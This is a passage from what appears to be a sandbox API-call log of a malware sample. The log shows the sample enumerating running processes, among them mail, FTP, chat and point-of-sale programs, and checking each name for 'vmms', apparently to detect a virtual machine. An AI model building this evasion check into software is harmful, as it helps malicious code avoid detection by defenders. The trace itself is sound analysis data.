lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0101.660] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357f480 [0101.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x357f480, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0101.660] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0101.660] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="vmms") returned 0x0 [0101.660] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0101.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0101.661] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357f180 [0101.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x357f180, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0101.661] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0101.661] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="vmms") returned 0x0 [0101.661] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0101.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0101.662] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x357e0d8 [0101.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x357e0d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0101.663] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0101.663] StrStrIA (lpFirst="icq.exe", lpSrch="vmms") returned 0x0 [0101.663] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0101.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.664] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356f960 [0101.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x356f960, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0101.664] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0101.664] StrStrIA (lpFirst="leechftp.exe", lpSrch="vmms") returned 0x0 [0101.664] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0101.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0101.665] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356f8e8 [0101.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x356f8e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0101.665] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0101.665] StrStrIA (lpFirst="ncftp.exe", lpSrch="vmms") returned 0x0 [0101.665] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0101.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.667] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356fb10 [0101.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x356fb10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0101.667] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0101.667] StrStrIA (lpFirst="notepad.exe", lpSrch="vmms") returned 0x0 [0101.667] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0101.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0101.668] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356fa50 [0101.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x356fa50, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0101.668] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0101.668] StrStrIA (lpFirst="operamail.exe", lpSrch="vmms") returned 0x0 [0101.668] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0101.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.669] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356fb28 [0101.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x356fb28, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0101.669] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0101.669] StrStrIA (lpFirst="pidgin.exe", lpSrch="vmms") returned 0x0 [0101.670] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0101.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0101.671] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356fb40 [0101.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x356fb40, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0101.671] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0101.671] StrStrIA (lpFirst="scriptftp.exe", lpSrch="vmms") returned 0x0 [0101.671] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0101.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0101.672] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356f978 [0101.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x356f978, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0101.672] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0101.672] StrStrIA (lpFirst="skype.exe", lpSrch="vmms") returned 0x0 [0101.672] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0101.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.673] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356f918 [0101.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x356f918, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0101.674] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0101.674] StrStrIA (lpFirst="smartftp.exe", lpSrch="vmms") returned 0x0 [0101.674] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0101.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.675] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356fa80 [0101.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x356fa80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0101.675] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0101.675] StrStrIA (lpFirst="totalcmd.exe", lpSrch="vmms") returned 0x0 [0101.675] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0101.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.676] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356f9a8 [0101.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x356f9a8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0101.676] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0101.676] StrStrIA (lpFirst="trillian.exe", lpSrch="vmms") returned 0x0 [0101.676] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0101.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.678] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356f8b8 [0101.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x356f8b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0101.678] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0101.678] StrStrIA (lpFirst="webdrive.exe", lpSrch="vmms") returned 0x0 [0101.678] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0101.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.679] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356fa98 [0101.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x356fa98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0101.679] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0101.679] StrStrIA (lpFirst="whatsapp.exe", lpSrch="vmms") returned 0x0 [0101.679] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0101.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.680] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356f9d8 [0101.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x356f9d8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0101.680] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0101.680] StrStrIA (lpFirst="winscp.exe", lpSrch="vmms") returned 0x0 [0101.680] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0101.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0101.682] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357f400 [0101.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x357f400, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0101.682] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0101.682] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="vmms") returned 0x0 [0101.682] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0101.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0101.707] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357f4a0 [0101.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x357f4a0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0101.708] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0101.708] StrStrIA (lpFirst="active-charge.exe", lpSrch="vmms") returned 0x0 [0101.708] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0101.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.709] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356f900 [0101.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x356f900, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0101.709] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0101.709] StrStrIA (lpFirst="accupos.exe", lpSrch="vmms") returned 0x0 [0101.709] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0101.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0101.710] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356f990 [0101.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x356f990, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0101.710] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0101.710] StrStrIA (lpFirst="afr38.exe", lpSrch="vmms") returned 0x0 [0101.710] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0101.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.712] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356f9f0 [0101.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x356f9f0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0101.712] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0101.712] StrStrIA (lpFirst="aldelo.exe", lpSrch="vmms") returned 0x0 [0101.712] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0101.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0101.713] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x356fa08 [0101.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x356fa08, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0101.713] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0101.715] StrStrIA (lpFirst="ccv_server.exe", lpSrch="vmms") returned 0x0 [0101.715] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0101.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0101.716] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x357f200 [0101.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x357f200, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0101.716] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0101.716] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="vmms") returned 0x0 [0101.716] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0101.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 